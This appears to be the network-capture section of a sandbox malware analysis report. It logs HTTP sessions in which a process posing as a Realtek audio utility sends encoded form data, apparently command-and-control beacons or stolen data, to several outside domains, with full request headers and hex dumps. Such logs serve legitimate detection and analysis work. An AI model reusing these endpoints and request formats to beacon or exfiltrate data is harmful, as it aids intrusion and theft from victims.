                                                                                        Data Raw: 77 49 58 68 41 47 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 54 34 39 6b 74 52 44 6d 50 52 2b 77 69 48 30 4f 79 49 39 51 43 52 74 68 30 61 65 6d 4f 47 77 48 75 36 4e 79 61 49 41 35 59 77 44 61 63 4c 6d 4f 42 57 43 55 33 4c 33 78 47 72 36 72 55 50 69 4e 71 4f 6f 55 6f 4c 36 6e 42 64 55 63 6a 52 37 6c 50 6d 70 30 47 32 42 79 45 55 35 42 49 4b 42 79 38 39 76 32 69 54 6e 69 73 75 51 75 4a 38 7a 75 62 6d 47 54 69 4e 6e 43 62 58 37 69 46 33 50 44 37 4d 41 68 39 30 42 33 6c 4b 79 66 46 7a 31 4b 4a 66 7a 62 36 56 61 46 34 70 57 71 50 61 78 6c 32 4c 45 36 4e 45 75 77 55 4c 70 56 76 64 74 6d 59 46 64 39 63 78 77 4a 43 77 33 4c 70 71 44 32 6a 59 78 65 2f 58 7a 6b 4c 64 45 44 48 6d 7a 63 34 6b 59 4b 73 33 77 70 56 62 67 63 6f 78 36 70 73 79 50 79 52 30 47 78 73 32 34 65 67 2f 4d 59 70 6b 6f 53 45 53 6b 6c 71 4e 6e 6c 62 43 4a 56 33 7a 6c 71 38 77 69 39 4f 59 79 6b 41 33 46 4f 62 61 6b 6e 71 37 4f 70 34 76 64 43 2b 72 43 30 64 67 77 67 6a 73 30 4b 73 6f 73 2f 4a 39 7a 44 4c 57 73 61 42 41 4e 53 59 67 4e 77 5a 76 78 [TRUNCATED]
                                                                                        Data Ascii: wIXhAG=t4Js6+7a0GL8T49ktRDmPR+wiH0OyI9QCRth0aemOGwHu6NyaIA5YwDacLmOBWCU3L3xGr6rUPiNqOoUoL6nBdUcjR7lPmp0G2ByEU5BIKBy89v2iTnisuQuJ8zubmGTiNnCbX7iF3PD7MAh90B3lKyfFz1KJfzb6VaF4pWqPaxl2LE6NEuwULpVvdtmYFd9cxwJCw3LpqD2jYxe/XzkLdEDHmzc4kYKs3wpVbgcox6psyPyR0Gxs24eg/MYpkoSESklqNnlbCJV3zlq8wi9OYykA3FObaknq7Op4vdC+rC0dgwgjs0Ksos/J9zDLWsaBANSYgNwZvxxQKzmN3YMCHfCyovbUybM8iek0NvGAhHUJH4cO977wdcprxdkOeCEQg/aYzC6m3UgMS9yZDq85x6n4umdNiliTaBcnU0pDtHCSe828uIx9tj/Sn6Bw215Oe9sOZPQ2OFf5SNfr5OvN8vUarcaJ28acEwLgJCdmYPFJBQHV2oWLzUSy1RmSi0OIldHo6t+ASkvIWAyXywxtvayM8+DpPC8WPqzOuufNXzKKtTq3fbRW93vl+AeZIdOdes0lYbodBn0KqJjtavKOnPo+5f7MwstjHVYG9m4aIOBL/yT432mUHq3h7kpOH3cPnFrx/mlGQ4zCZQ51JX4fb+F88Mlp1DqsTXfgBXou1o4WHheNMquky49zzbKiDGN2wXoffWopw0xgxwfDcGEhHo1AyJTiq0CYR3p6VecaISxnL1pFmPNAHx3xGfYt5as+ai0npgrfjU0MB6o1q3gAsk77WAntInaqDcFVWxPPuqTrz7r0sUNlS33Jlnl7T5+t7Qu2XmuMdsb5Rv75HzJ0IDgIhTmsS3e7H3fQiqtiOxRHt9euhn8Up6cPvKbx1vW/9AasSOL+H5ILz0i4XUHjVZPqBUFZXTcSmAYgwYoFz0JMbJkc1utdZqXwlys58IBPeX9YZv3wbKTFA/Qvtu8jPCWSJgweWWIH31TNP/NbUY1j [TRUNCATED]


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.11.204974984.32.84.32807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:29:22.147238016 CET414OUTGET /jytl/?wIXhAG=g6hM5OfAy0aZTOdwtizvGwaLh1tc9b9nbH1D7PSRWxwlxqBVZ/VTfBjjReyEGXu+lurHf7fRU8SuqLFFtve4Dt4YiF/6MWt/ODdeGmxIPeV05u7M1niwgNE=&67ssp=tVX5mtZ66UVF HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.techmiseajour.net
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Nov 27, 2024 11:29:22.565191984 CET1289INHTTP/1.1 200 OK
                                                                                        Date: Wed, 27 Nov 2024 10:29:04 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 9973
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Server: hcdn
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        x-hcdn-request-id: 2838f6c1f145e0a795ef0aa3f3d37374-jnb-edge2
                                                                                        Expires: Wed, 27 Nov 2024 10:29:03 GMT
                                                                                        Cache-Control: no-cache
                                                                                        Accept-Ranges: bytes
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;m
                                                                                        Nov 27, 2024 11:29:22.565234900 CET1289INData Raw: 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38
                                                                                        Data Ascii: argin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:60
                                                                                        Nov 27, 2024 11:29:22.565268040 CET1289INData Raw: 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f
                                                                                        Data Ascii: ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;lin
                                                                                        Nov 27, 2024 11:29:22.565356970 CET1289INData Raw: 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74
                                                                                        Data Ascii: ze:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:
                                                                                        Nov 27, 2024 11:29:22.565392017 CET1289INData Raw: 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f
                                                                                        Data Ascii: -graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidde
                                                                                        Nov 27, 2024 11:29:22.565483093 CET1289INData Raw: 46 69 6e 64 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d
                                                                                        Data Ascii: Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any of your hosting plans. Follow the article
                                                                                        Nov 27, 2024 11:29:22.565517902 CET1289INData Raw: 54 46 2d 31 36 20 76 61 6c 75 65 22 29 3b 36 35 35 33 35 3c 72 26 26 28 72 2d 3d 36 35 35 33 36 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 72 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 29 2c 72 3d
                                                                                        Data Ascii: TF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;
                                                                                        Nov 27, 2024 11:29:22.565601110 CET1289INData Raw: 68 61 72 43 6f 64 65 41 74 28 30 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 75 74 66 31 36 2e 65 6e 63 6f 64 65 28 6d 29 7d 2c 74 68 69 73 2e 65 6e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 61 29 7b 76 61 72 20 68 2c 66 2c 69 2c 63 2c 75
                                                                                        Data Ascii: harCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.11.204975013.248.169.48807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:29:27.944976091 CET674OUTPOST /wb7v/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.aktmarket.xyz
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 203
                                                                                        Origin: http://www.aktmarket.xyz
                                                                                        Referer: http://www.aktmarket.xyz/wb7v/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Raw: 77 49 58 68 41 47 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 39 7a 73 4f 2b 62 6d 4f 55 43 6d 73 6e 58 75 67 55 31 2f 77 58 48 36 61 55 45 66 63 34 36 68 45 44 74 52 2f 57 54 4a 58 51 30 56 57 57 63 59 56 75 57 58 63 33 71 6b 4a 33 4c 72 59 44 6f 47 4a 79 79 4d 31 65 68 6f 54 48 4d 46 50 58 75 39 5a 31 73 37 65 46 54 55 64 6f 32 2f 34 30 7a 46 6f 67 66 66 4a 72 66 6f 6d 74 68 74 51 68 37 35 48 76 63 6f 6d 4b 58 6d 34 68 39 65 55 54 2b 66 6d 55 55 31 75 4d 66 71 6a 51 42 38 4f 35 6a 77 71 44 68 72 33 6f 74 32 33 41 55 46 45 47 52 56 78 51 4b 62 77 66 34 65 77 54 4b 70 51 30 33 6a 53 32 67 71 59 64 77 3d 3d
                                                                                        Data Ascii: wIXhAG=FCc6E16lz2LQ9zsO+bmOUCmsnXugU1/wXH6aUEfc46hEDtR/WTJXQ0VWWcYVuWXc3qkJ3LrYDoGJyyM1ehoTHMFPXu9Z1s7eFTUdo2/40zFogffJrfomthtQh75HvcomKXm4h9eUT+fmUU1uMfqjQB8O5jwqDhr3ot23AUFEGRVxQKbwf4ewTKpQ03jS2gqYdw==


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.11.204975113.248.169.48807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:29:30.666505098 CET694OUTPOST /wb7v/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.aktmarket.xyz
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 223
                                                                                        Origin: http://www.aktmarket.xyz
                                                                                        Referer: http://www.aktmarket.xyz/wb7v/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Raw: 77 49 58 68 41 47 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 38 53 63 4f 6c 34 4f 4f 46 53 6d 72 37 6e 75 67 47 31 2f 30 58 48 6d 61 55 41 75 48 34 73 52 45 44 4e 68 2f 59 79 4a 58 41 6b 56 57 4f 4d 59 4d 6b 32 58 62 33 71 70 30 33 4b 58 59 44 6f 43 4a 79 79 38 31 65 51 6f 51 57 4d 46 4a 43 65 39 62 74 4d 37 65 46 54 55 64 6f 32 37 65 30 7a 64 6f 68 76 76 4a 72 2b 6f 70 67 42 73 69 32 4c 35 48 2b 4d 6f 69 4b 58 6e 43 68 38 53 79 54 39 33 6d 55 51 6c 75 4d 75 71 6b 62 42 38 49 39 6a 78 6e 4d 45 53 7a 78 73 2b 6f 54 7a 70 4b 4a 43 56 47 63 38 57 71 43 4b 71 55 51 5a 31 69 77 48 61 36 30 69 72 44 41 78 6b 45 45 59 6d 73 2f 53 5a 52 4c 4d 67 76 48 74 62 76 52 2b 55 3d
                                                                                        Data Ascii: wIXhAG=FCc6E16lz2LQ8ScOl4OOFSmr7nugG1/0XHmaUAuH4sREDNh/YyJXAkVWOMYMk2Xb3qp03KXYDoCJyy81eQoQWMFJCe9btM7eFTUdo27e0zdohvvJr+opgBsi2L5H+MoiKXnCh8SyT93mUQluMuqkbB8I9jxnMESzxs+oTzpKJCVGc8WqCKqUQZ1iwHa60irDAxkEEYms/SZRLMgvHtbvR+U=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.11.204975213.248.169.48807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:29:33.384470940 CET2578OUTPOST /wb7v/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.aktmarket.xyz
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 7371
                                                                                        Origin: http://www.aktmarket.xyz
                                                                                        Referer: http://www.aktmarket.xyz/wb7v/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Raw: 77 49 58 68 41 47 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 38 53 63 4f 6c 34 4f 4f 46 53 6d 72 37 6e 75 67 47 31 2f 30 58 48 6d 61 55 41 75 48 34 76 78 45 43 2b 70 2f 58 78 68 58 44 6b 56 57 48 73 59 4a 6b 32 58 47 33 71 78 77 33 4b 61 74 44 72 71 4a 6a 67 30 31 59 6a 77 51 50 63 46 4a 64 4f 39 59 31 73 37 50 46 54 6b 52 6f 32 4c 65 30 7a 64 6f 68 73 33 4a 73 76 6f 70 69 42 74 51 68 37 35 39 76 63 6f 61 4b 58 65 67 68 38 57 45 54 4e 58 6d 58 78 4a 75 66 73 53 6b 57 42 38 4b 36 6a 77 30 4d 45 57 38 78 73 79 65 54 7a 30 58 4a 42 31 47 4d 61 6e 72 59 34 71 79 4a 76 35 70 79 58 75 35 6a 53 76 4a 43 43 55 59 4a 35 57 56 36 43 4a 32 49 71 39 75 54 4e 2b 70 51 37 6b 4a 62 4c 4e 35 6d 69 52 4e 37 69 66 45 6c 70 50 2b 78 48 47 42 2f 2f 52 75 6f 71 61 56 2b 2f 31 6b 35 59 75 46 36 42 33 73 74 31 46 51 72 58 30 49 66 50 36 62 73 48 53 6d 44 4f 34 76 42 49 4c 5a 58 47 79 52 6a 38 38 76 56 54 33 78 46 43 53 41 69 70 32 39 37 34 34 31 49 57 38 48 68 6e 64 4a 71 52 64 35 4b 52 39 39 39 53 36 69 34 6f 39 63 47 7a 6b [TRUNCATED]
                                                                                        Data Ascii: wIXhAG=FCc6E16lz2LQ8ScOl4OOFSmr7nugG1/0XHmaUAuH4vxEC+p/XxhXDkVWHsYJk2XG3qxw3KatDrqJjg01YjwQPcFJdO9Y1s7PFTkRo2Le0zdohs3JsvopiBtQh759vcoaKXegh8WETNXmXxJufsSkWB8K6jw0MEW8xsyeTz0XJB1GManrY4qyJv5pyXu5jSvJCCUYJ5WV6CJ2Iq9uTN+pQ7kJbLN5miRN7ifElpP+xHGB//RuoqaV+/1k5YuF6B3st1FQrX0IfP6bsHSmDO4vBILZXGyRj88vVT3xFCSAip297441IW8HhndJqRd5KR999S6i4o9cGzkMavfVrLnuJOUufb00VaZsExGUtqQa+flNdbLJwY9fc+fy2Lpnch0bu2l5WCKLNTILMhCyDfIn/VxX5PQLlMjz4lEuKv1kJc2KyBB82KK5tiO8CJ6qF1RM+9xClf7uocUrsbJWG26dxCz7gtFHM3ebsOZPJk4B2OGh59FYA833oFP51mJUaPnlO/og054crVvu/+CKnxmIsKM7oZqPcJox+yIIsAXlRxFfBz3ImeybKXfMSdWjP83ORBUF7NN01ma5Hx0YoDrwfZrrjp2H3psyanwDEzmbmArDF+NJjmHk5VMpk6+H2XikTf8buXGaWtAQNeRy4i5WnQsND0poa8HXWiIsC8jdS+ESUo5LszGQxw6rj0/UUI4lyzHoFMZP7RO0Q7ATGiw8nCtpdujOg0Owk7nXYzIjCpsf1RnHhh3NdYHekwJ2mIUjgaI/+Gx0oLDFQHGfvyQJIrAQeM7PBdFxcpFxDWX50neqCwy8iMei6fHHWlyoPJ3tuuls8BtK1rNucvN7h9rqX5RfgylQ9mo27iohEwLtLhp/AVHiNcxiuPRg1Dr4SfI2VMCrzhq18bNTiQgbe9f1MiWPJJ90jys1mQMzxctK1T2bFPxlkTrGDZIKQsk5jS1DL/ydjVh5VJeHmPuM5iR4V6K9ATFimd8yCpA+m2lWWObaE [TRUNCATED]
                                                                                        Nov 27, 2024 11:29:33.384531975 CET5265OUTData Raw: 51 78 4d 6e 48 56 38 71 53 67 79 79 6f 74 4b 4a 4e 4f 79 51 39 66 6c 36 6f 57 33 30 44 54 5a 72 6b 5a 31 2f 46 4a 72 47 6c 76 4b 6e 7a 33 33 51 6b 47 74 43 66 33 41 73 59 4a 39 62 39 70 47 2b 6f 67 6a 45 7a 43 55 62 4a 63 73 79 70 62 35 30 47 75
                                                                                        Data Ascii: QxMnHV8qSgyyotKJNOyQ9fl6oW30DTZrkZ1/FJrGlvKnz33QkGtCf3AsYJ9b9pG+ogjEzCUbJcsypb50GuWGpJi+UvDWQbKVOUGiZJpCE2Hp7NHWJZs8py+GRCUP1nPHLjOqRhJVqt2DZ8p1QC94+4JMZnRGL9XyFR/dWFZ6VtU34yWcjJJkeslNQc0U8pjGQD44YheH+oq1veYTqoiyFRYp/a5ZnPgNBa3TAUQS9Sh0jOVQtsn


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.11.204975313.248.169.48807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:29:36.102649927 CET410OUTGET /wb7v/?wIXhAG=IA0aHAKfw1DI7BcblrymbxKn4Du9G2zIJhioZgrDgtprV+dFeA51d3E/BswRkzzY9dVkqa6lP7qo/SE9ZBwNIeIqaoIYusGiDzIcpGvOs3Qutuf7i9hpgx0=&67ssp=tVX5mtZ66UVF HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.aktmarket.xyz
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Nov 27, 2024 11:29:36.290648937 CET401INHTTP/1.1 200 OK
                                                                                        Server: openresty
                                                                                        Date: Wed, 27 Nov 2024 10:29:36 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 261
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 77 49 58 68 41 47 3d 49 41 30 61 48 41 4b 66 77 31 44 49 37 42 63 62 6c 72 79 6d 62 78 4b 6e 34 44 75 39 47 32 7a 49 4a 68 69 6f 5a 67 72 44 67 74 70 72 56 2b 64 46 65 41 35 31 64 33 45 2f 42 73 77 52 6b 7a 7a 59 39 64 56 6b 71 61 36 6c 50 37 71 6f 2f 53 45 39 5a 42 77 4e 49 65 49 71 61 6f 49 59 75 73 47 69 44 7a 49 63 70 47 76 4f 73 33 51 75 74 75 66 37 69 39 68 70 67 78 30 3d 26 36 37 73 73 70 3d 74 56 58 35 6d 74 5a 36 36 55 56 46 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wIXhAG=IA0aHAKfw1DI7BcblrymbxKn4Du9G2zIJhioZgrDgtprV+dFeA51d3E/BswRkzzY9dVkqa6lP7qo/SE9ZBwNIeIqaoIYusGiDzIcpGvOs3Qutuf7i9hpgx0=&67ssp=tVX5mtZ66UVF"}</script></head></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.11.204975466.29.149.46807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:29:41.727457047 CET677OUTPOST /r2k9/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.golivenow.live
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 203
                                                                                        Origin: http://www.golivenow.live
                                                                                        Referer: http://www.golivenow.live/r2k9/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Raw: 77 49 58 68 41 47 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 2b 72 49 48 4a 79 37 47 4a 62 37 72 35 57 39 54 30 2f 7a 73 36 2f 59 6a 51 76 68 74 67 4c 34 46 67 59 57 59 56 78 76 47 56 50 65 64 37 70 47 57 73 34 35 43 4b 77 7a 61 72 52 51 2f 4d 50 56 61 50 5a 4e 30 38 4a 6f 64 79 52 57 2b 2f 55 67 67 4f 37 50 2b 57 43 37 4a 5a 6d 38 59 42 35 57 4e 64 73 71 6c 69 50 38 52 36 7a 55 4b 73 42 66 6e 69 71 61 79 79 4b 36 48 39 34 61 2b 62 6a 34 54 72 76 39 55 56 43 38 65 78 6e 48 6c 74 4f 34 2f 52 41 53 74 4f 76 2f 33 68 6c 48 45 7a 63 58 56 6e 59 70 77 47 4c 32 30 36 6d 58 73 49 68 70 75 56 53 6f 41 31 51 3d 3d
                                                                                        Data Ascii: wIXhAG=c+e6HpKRV8z2+rIHJy7GJb7r5W9T0/zs6/YjQvhtgL4FgYWYVxvGVPed7pGWs45CKwzarRQ/MPVaPZN08JodyRW+/UggO7P+WC7JZm8YB5WNdsqliP8R6zUKsBfniqayyK6H94a+bj4Trv9UVC8exnHltO4/RAStOv/3hlHEzcXVnYpwGL206mXsIhpuVSoA1Q==
                                                                                        Nov 27, 2024 11:29:41.915479898 CET637INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 27 Nov 2024 10:29:41 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 493
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
